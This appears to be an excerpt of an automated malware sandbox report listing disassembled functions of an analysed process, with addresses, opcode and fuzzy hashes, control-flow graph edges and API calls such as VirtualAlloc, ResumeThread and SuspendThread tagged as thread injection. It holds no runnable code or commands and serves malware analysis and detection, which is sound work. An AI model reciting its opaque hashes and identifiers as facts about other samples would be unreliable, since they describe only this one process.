                                                    • Opcode ID: d9b62aae353e325c0e555b55b20f6e48634e01702ace476eba48a7092d7a7650
                                                    • Instruction ID: 946505c2c22dbf514035e66a5c62b8d9b8391512eb9bc87ccfb39c356a06b252
                                                    • Opcode Fuzzy Hash: d9b62aae353e325c0e555b55b20f6e48634e01702ace476eba48a7092d7a7650
                                                    • Instruction Fuzzy Hash: 8452BF34A09649CFEB59CF68C4906B877A1FF4A300F5081BDD45FC7696DA39E985CB80
                                                    Function 00007FFAAC67F9C0 Relevance: 5.3, Strings: 4, Instructions: 309COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )K_H$XV$p[U$r6S
                                                    • API String ID: 0-515783648
                                                    • Opcode ID: 9eae906c11623bd23d6229e9c753eac9e7c35f2324ef78f59ae3c29193125b0b
                                                    • Instruction ID: a054a19dbba79453542005653223e4244b13b868cf4ee9c0ccbc84e6716948e9
                                                    • Opcode Fuzzy Hash: 9eae906c11623bd23d6229e9c753eac9e7c35f2324ef78f59ae3c29193125b0b
                                                    • Instruction Fuzzy Hash: E8C1EC70904A2DCFEB94EF68C494BA9B7F2FF59304F5045A9D00DE7292CB34A985CB40
                                                    Function 00007FFAAC67F9A9 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XV$p[U
                                                    • API String ID: 0-1301722620
                                                    • Opcode ID: 1db39a8db22a6196e9fa62ba6807962b134e6e91aa5ea6f8be61e35fdd3e8d53
                                                    • Instruction ID: a24831b347a0857967ffbd0da714aeb119bc096e4bf792393e7aff027ee5b51e
                                                    • Opcode Fuzzy Hash: 1db39a8db22a6196e9fa62ba6807962b134e6e91aa5ea6f8be61e35fdd3e8d53
                                                    • Instruction Fuzzy Hash: FE91E971904A2DCFEB94EF28C895BA977F2FF59300F4095A9D00DE3292CA34A985CB41
                                                    Function 00007FFAACD93598 Relevance: 2.0, Instructions: 1957COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 696 7ffaacd93598-7ffaacd93763 711 7ffaacd93769-7ffaacd937f3 696->711 712 7ffaacd94d8a-7ffaacd94da8 call 7ffaacd94f2d call 7ffaacd94f7d 696->712 724 7ffaacd937f5-7ffaacd93828 711->724 725 7ffaacd9382d-7ffaacd9390c 711->725 728 7ffaacd93912-7ffaacd939ad 724->728 725->728 740 7ffaacd939e7-7ffaacd93ac6 728->740 741 7ffaacd939af-7ffaacd939e2 728->741 744 7ffaacd93acc-7ffaacd93b67 740->744 741->744 756 7ffaacd93b73-7ffaacd93c18 744->756 757 7ffaacd93b69-7ffaacd93b6e 744->757 758 7ffaacd93c1c-7ffaacd93caf 756->758 757->758 768 7ffaacd93cbb-7ffaacd93d61 758->768 769 7ffaacd93cb1-7ffaacd93cb6 758->769 770 7ffaacd93d64-7ffaacd93df7 768->770 769->770 780 7ffaacd93df9-7ffaacd93e2c 770->780 781 7ffaacd93e31-7ffaacd93f10 770->781 785 7ffaacd93f16-7ffaacd93fb1 780->785 781->785 796 7ffaacd93fb3-7ffaacd93fe6 785->796 797 7ffaacd93feb-7ffaacd9415b 785->797 800 7ffaacd94161-7ffaacd941fc 796->800 797->800 813 7ffaacd94236-7ffaacd943a6 800->813 814 7ffaacd941fe-7ffaacd94231 800->814 818 7ffaacd943ac-7ffaacd94447 813->818 814->818 833 7ffaacd94449-7ffaacd9447c 818->833 834 7ffaacd94481-7ffaacd94560 818->834 838 7ffaacd94566-7ffaacd94601 833->838 834->838 852 7ffaacd94603-7ffaacd94636 838->852 853 7ffaacd9463b-7ffaacd9471a 838->853 856 7ffaacd94720-7ffaacd947bb 852->856 853->856 868 7ffaacd947f5-7ffaacd94965 856->868 869 7ffaacd947bd-7ffaacd947f0 856->869 873 7ffaacd9496b-7ffaacd94a06 868->873 869->873 885 7ffaacd94a08-7ffaacd94a3b 873->885 886 7ffaacd94a40-7ffaacd94bb0 873->886 891 7ffaacd94bb6-7ffaacd94c51 885->891 886->891 905 7ffaacd94c53-7ffaacd94c58 891->905 906 7ffaacd94c5d-7ffaacd94d7e 891->906 907 7ffaacd94d81-7ffaacd94d84 905->907 906->907 907->712
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a08f4c60d528a0edfab9c9cffe1449ba831e4538ec4b3ab224aefdec3ed7d64
                                                    • Instruction ID: a0af0e08d2a3f181287c7613475e20f03702ebd10035cfcb31471d1231a797ce
                                                    • Opcode Fuzzy Hash: 2a08f4c60d528a0edfab9c9cffe1449ba831e4538ec4b3ab224aefdec3ed7d64
                                                    • Instruction Fuzzy Hash: E7F2A774A0891D8FDF98EF18C894FA9B7B1FB69305F1441E9900ED76A1DA35AE81CF40
                                                    Function 00007FFAAC640710 Relevance: 1.7, APIs: 1, Instructions: 495memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac640000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: d2ec1bc0a3644c61b46f24cffded27b505f8e1e3b5be003c3dca79e0325d6229
                                                    • Instruction ID: 62fc27b2b0cb61a90ee20cd9cfc5824efda98c417d0fa811e054d489f82bdf5d
                                                    • Opcode Fuzzy Hash: d2ec1bc0a3644c61b46f24cffded27b505f8e1e3b5be003c3dca79e0325d6229
                                                    • Instruction Fuzzy Hash: 17F18F7091968D8FEB85EF68C855AE97BF0FF59300F1051BAE40DD3252DB34A989CB81
                                                    Function 00007FFAAC7F0040 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 980 7ffaac7f0040-7ffaac7f0079 981 7ffaac7f007c-7ffaac7f0152 ResumeThread 980->981 982 7ffaac7f007b 980->982 986 7ffaac7f0154 981->986 987 7ffaac7f015a-7ffaac7f01a4 981->987 982->981 986->987
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1877671867.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac7e0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: c9ee7fe863d2b1109af8da8a80e577cbcd2c754b217c186c1feecb6b96d5dc85
                                                    • Instruction ID: 58ffca50bbc90a21ffd4d8300d2927d7e5b6df9035e5fe60bf16e743814bb295
                                                    • Opcode Fuzzy Hash: c9ee7fe863d2b1109af8da8a80e577cbcd2c754b217c186c1feecb6b96d5dc85
                                                    • Instruction Fuzzy Hash: 8E516A7090878C8FDB55DBA8C895AE9BFF0FF5A310F1481AFD049DB292CA349846CB41
                                                    Function 00007FFAAC7EE84D Relevance: 1.6, APIs: 1, Instructions: 141threadinjectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 990 7ffaac7ee84d-7ffaac7ee859 991 7ffaac7ee864-7ffaac7ee932 SuspendThread 990->991 992 7ffaac7ee85b-7ffaac7ee863 990->992 996 7ffaac7ee934 991->996 997 7ffaac7ee93a-7ffaac7ee984 991->997 992->991 996->997
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1877671867.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac7e0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: 0c92798a4fca5d7adf6c8e5094715295401a5ba7812d0c259efd2701a61e1134
                                                    • Instruction ID: 2b7185fbfbab0819ff84026e36f195a98ca663d03d48b283f24db43be9a01f99
                                                    • Opcode Fuzzy Hash: 0c92798a4fca5d7adf6c8e5094715295401a5ba7812d0c259efd2701a61e1134
                                                    • Instruction Fuzzy Hash: 8B413970D08A4D8FEB98DFA8D885BEDBBF0FB5A311F10416AD04DE7252DA70A845CB41
                                                    Function 00007FFAAC7F1E35 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1000 7ffaac7f1e35-7ffaac7f1f13 GetFileAttributesW 1004 7ffaac7f1f15 1000->1004 1005 7ffaac7f1f1b-7ffaac7f1f59 1000->1005 1004->1005
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1877671867.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac7e0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 437e7b63f52734702c34ff2faea326de814f50a53e5310087f0408a698732d38
                                                    • Instruction ID: 2dd9cf8e0b9152fcb796e93e21b0ef136fff302251bf51398ce326bb8c27a267
                                                    • Opcode Fuzzy Hash: 437e7b63f52734702c34ff2faea326de814f50a53e5310087f0408a698732d38
                                                    • Instruction Fuzzy Hash: 25411870D08A4C8FEB98DFA8D885BEDBBF1FB5A310F10416AD00DE7252DA70A845CB41
                                                    Function 00007FFAAC7F01A9 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1877671867.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac7e0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: fea99751a20d787d89fbec29a0e47418043d30309d6d87543882c38291e2eeef
                                                    • Instruction ID: 2a16e905c0086b6fa6b1e2a87e316f481fa237d1ae4b74408d70cfd1278d799d
                                                    • Opcode Fuzzy Hash: fea99751a20d787d89fbec29a0e47418043d30309d6d87543882c38291e2eeef
                                                    • Instruction Fuzzy Hash: 46416C7090875C8FDB59DFA8C888BECBBF0FB16310F1041AAD049E7292DA34A845CB41
                                                    Function 00007FFAACD92991 Relevance: .4, Instructions: 410COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c0ab81572bf8b433f121d815f4fddad1466e13e72d47910972aafa26e0fe0a7c
                                                    • Instruction ID: f3e77458b8362b17f641466dae4aead0482bda6101745834f5b70d625ac521a3
                                                    • Opcode Fuzzy Hash: c0ab81572bf8b433f121d815f4fddad1466e13e72d47910972aafa26e0fe0a7c
                                                    • Instruction Fuzzy Hash: 68D1F434A0EA068FE368DB28D49157577E1FF46304B14857DC4AEC3996EA2EF84A87C1
                                                    Function 00007FFAACD9F16D Relevance: .4, Instructions: 357COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8548371cdf96215a205791af32c007851964c8ec7075fe9dba5d3948907e1255
                                                    • Instruction ID: 57290e824d7fba2b494d162eedd4c073020aafa1ce87e93e9da77a1615e3c37d
                                                    • Opcode Fuzzy Hash: 8548371cdf96215a205791af32c007851964c8ec7075fe9dba5d3948907e1255
                                                    • Instruction Fuzzy Hash: 16D18774A0891D8FDFD8EB18C898FA9B7B1FB69301F1441A9D00EE7661DA35AD85CF40
                                                    Function 00007FFAACD9196F Relevance: .3, Instructions: 336COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0286f75077b64cd2b7a5665d2dabd254fbbec7782afa6ed29f35f79509a644d7
                                                    • Instruction ID: 52c8e363b15b71cbec57766296fa29694303213a1c89cbd223fabb1a576eb7bf
                                                    • Opcode Fuzzy Hash: 0286f75077b64cd2b7a5665d2dabd254fbbec7782afa6ed29f35f79509a644d7
                                                    • Instruction Fuzzy Hash: F5C1A134619546CBFB09CF24C0D06B577A1FF46310B5485BDC86F8BA8AEA3DE846CB84
                                                    Function 00007FFAACDA19B8 Relevance: .2, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62061210ad96ba40997309af2e763f82a0cc1b708c7d48802d244f34679f6bf8
                                                    • Instruction ID: 53635ea52c6464783aa9837c495ab51d490725d401f3cec1ad5a0c1a6535181d
                                                    • Opcode Fuzzy Hash: 62061210ad96ba40997309af2e763f82a0cc1b708c7d48802d244f34679f6bf8
                                                    • Instruction Fuzzy Hash: 08512B2371DE4A8FE7A9A72C84552B67BE1FF9A75170481BED04EC31A6CD19EC068780
                                                    Function 00007FFAAC675000 Relevance: .2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b51a63ec9da0840291cdbb44beae5930abc8b75a1b941c09c249247b349b9743
                                                    • Instruction ID: bbfc162f47fa9d5d17ce6abc4d6ff2c4e96cca4f55c24fa507fc6cafe44aedfc
                                                    • Opcode Fuzzy Hash: b51a63ec9da0840291cdbb44beae5930abc8b75a1b941c09c249247b349b9743
                                                    • Instruction Fuzzy Hash: F851D07188E3C58FE7138B305C661E53FB49F13215B1E91EBD488CA4E3D51E959AC3A2
                                                    Function 00007FFAACD9FDB9 Relevance: .2, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14e87945ef56cb157d3fc5ca4f16e75b70e29704eafcc8b1c4332f0781f20cd3
                                                    • Instruction ID: f4720e365d7e9feb5689b48a00d79bdcfdd00fb1aa21a41ba328221a60b9f19f
                                                    • Opcode Fuzzy Hash: 14e87945ef56cb157d3fc5ca4f16e75b70e29704eafcc8b1c4332f0781f20cd3
                                                    • Instruction Fuzzy Hash: 3551B534A0891DCFDF99EB18C894BE8B7B1FB69305F1041A9D00EE7691DA35AE85CF40
                                                    Function 00007FFAAC675090 Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ed6f675807c66f13df9d028f154d37b3577732b318e0c1bf4e58d6943e62d55
                                                    • Instruction ID: 93f68afec06cf58d2f36fc0a53cd2eafadc4d0c5fbbec197a35b82f79ed87ede
                                                    • Opcode Fuzzy Hash: 4ed6f675807c66f13df9d028f154d37b3577732b318e0c1bf4e58d6943e62d55
                                                    • Instruction Fuzzy Hash: BE31E17188E2D59FE7178B305C175E63FA4DF03321B1A41E7E048CB4A2C52DA29AC3E2
                                                    Function 00007FFAAC67AFCD Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de39b827e755d64767cd42fdae3a6f3e8271e418453c8f9f79c5e8009fc5325a
                                                    • Instruction ID: f535c551887f48af79410aed6224ae6b117b3546fb84297bfe060bbb76e5410a
                                                    • Opcode Fuzzy Hash: de39b827e755d64767cd42fdae3a6f3e8271e418453c8f9f79c5e8009fc5325a
                                                    • Instruction Fuzzy Hash: 8421AE7080964CDFEF55EF68C849AED7BA0EF59300F0461AAE40DD7192DB34E994CB81
                                                    Function 00007FFAAC67F6C9 Relevance: .1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac7884d96b61ce8495b0b020e62186d82d17091f76e55202f78de1ee8ac488e9
                                                    • Instruction ID: ae226d08099d7878adf3a9eb87f2554f2cfe7132bbcc79fc8cb87e2669586187
                                                    • Opcode Fuzzy Hash: ac7884d96b61ce8495b0b020e62186d82d17091f76e55202f78de1ee8ac488e9
                                                    • Instruction Fuzzy Hash: 64214C7080965D8FEB85EF64C949AF97BF0FF29300F0454AAD41DC7191DB34A998CB81
                                                    Function 00007FFAAC67F5F9 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf86c68219bd25922c247dff9f6264d5b56cda4682a7e23b22eb67db0a0ed596
                                                    • Instruction ID: 55e82d099c1826a689a8fb0134af080f74b31018993d55094aaa30727b8431b2
                                                    • Opcode Fuzzy Hash: bf86c68219bd25922c247dff9f6264d5b56cda4682a7e23b22eb67db0a0ed596
                                                    • Instruction Fuzzy Hash: D621817180964DCFEB85EF68C849AED7BB1FF19300F0455AAE40CC3191DB349585CB81
                                                    Function 00007FFAACDA3560 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 04c740e1f211a451d326095326bd4959981adaf9d24cfd640374934c7667a902
                                                    • Instruction ID: 2cbb0adea1a9742755a503fe5d1dc1ef475ea2f72155fb088f6f09e7ac959e09
                                                    • Opcode Fuzzy Hash: 04c740e1f211a451d326095326bd4959981adaf9d24cfd640374934c7667a902
                                                    • Instruction Fuzzy Hash: 7E11DC7084D78A9FEB429F28880A4E57FF0EF16311F0581EBE448C71A2D639E559C781
                                                    Function 00007FFAACD90D60 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 416e9fc1c74f37f39d2d2c9f3a6c67ba0ceb60f55a0579304c51b8d99ea4d09d
                                                    • Instruction ID: b6038062499fc072dbbe9de89fe403f5b2c2e1c9b60e3516560d2497b10cba23
                                                    • Opcode Fuzzy Hash: 416e9fc1c74f37f39d2d2c9f3a6c67ba0ceb60f55a0579304c51b8d99ea4d09d
                                                    • Instruction Fuzzy Hash: 8311273275CA494FE744EB68A4129F977D1FF9A211B804ABAC48EC34D3DD19F40983C4
                                                    Function 00007FFAAC67F739 Relevance: .1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d9ea6eb73adfb61cdf97e1b2194554966e08299fd19e22ad5f2a82826d89714d
                                                    • Instruction ID: 94c129069f0acb8595bfc7e6127eb18bc17b50e8522da83cffcb6de8cfe9c749
                                                    • Opcode Fuzzy Hash: d9ea6eb73adfb61cdf97e1b2194554966e08299fd19e22ad5f2a82826d89714d
                                                    • Instruction Fuzzy Hash: 3C11A27080864DCFEB86EF64C855AE97FB1FF19300F0454A6E01DC7192DB34A948CB81
                                                    Function 00007FFAAC67F809 Relevance: .1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a5b6d155220d8789875fd1a7682e2efdee84265f81b1469e673815a27d2ea134
                                                    • Instruction ID: 19748b510236d323dd7458fee6a790276103b0f99108a732cb3354fddae69763
                                                    • Opcode Fuzzy Hash: a5b6d155220d8789875fd1a7682e2efdee84265f81b1469e673815a27d2ea134
                                                    • Instruction Fuzzy Hash: 8A219D71809A4DCFEB86EF68C855AED7BB0FF1A300F0455A6D00CC7192DB34A988CB81
                                                    Function 00007FFAAC67F661 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55231a97936b12354ccaf1d82c9f71625fa251fc5d43ac90b32dccc500056338
                                                    • Instruction ID: cd55e68c70061d9c65a465876336d32bcb2a0b98f3004b196df90bbdbff87199
                                                    • Opcode Fuzzy Hash: 55231a97936b12354ccaf1d82c9f71625fa251fc5d43ac90b32dccc500056338
                                                    • Instruction Fuzzy Hash: 3F119D7080964DCFEB86EF64C949AE97BA1FF19300F0464A9D01DC7191DB35A948CB82
                                                    Function 00007FFAAC679DB9 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c2fb20b73d6964da0937800f9e195be52b96ed30be3b253bd0aea7840fdd0eba
                                                    • Instruction ID: 18b2d91654aaa04b11905c070d726e182e20dea1d46f880db01eca6e21a60aac
                                                    • Opcode Fuzzy Hash: c2fb20b73d6964da0937800f9e195be52b96ed30be3b253bd0aea7840fdd0eba
                                                    • Instruction Fuzzy Hash: D0112E70808A8D8FDF45EF58C859AEA7FF0FF29301F0545AAE408D7251D7349954CB81
                                                    Function 00007FFAAC67B029 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce3ae7099ce257281e0c6f265516506a539945942b2cf24361a14c148fa4ff06
                                                    • Instruction ID: bf99b74c7c9ecc924776d52d032963fd2aa88e9ec6d9e381f090198535ab003b
                                                    • Opcode Fuzzy Hash: ce3ae7099ce257281e0c6f265516506a539945942b2cf24361a14c148fa4ff06
                                                    • Instruction Fuzzy Hash: A4112A70808A8D8FDF85EF68C859AA97BF0FF69300F0405AAE418D72A1D735D544CB81
                                                    Function 00007FFAAC67F799 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: adf107f0a42e8e1cf2386d94de3bf435734c4f1ab65052d3e38c1ddda044ce5a
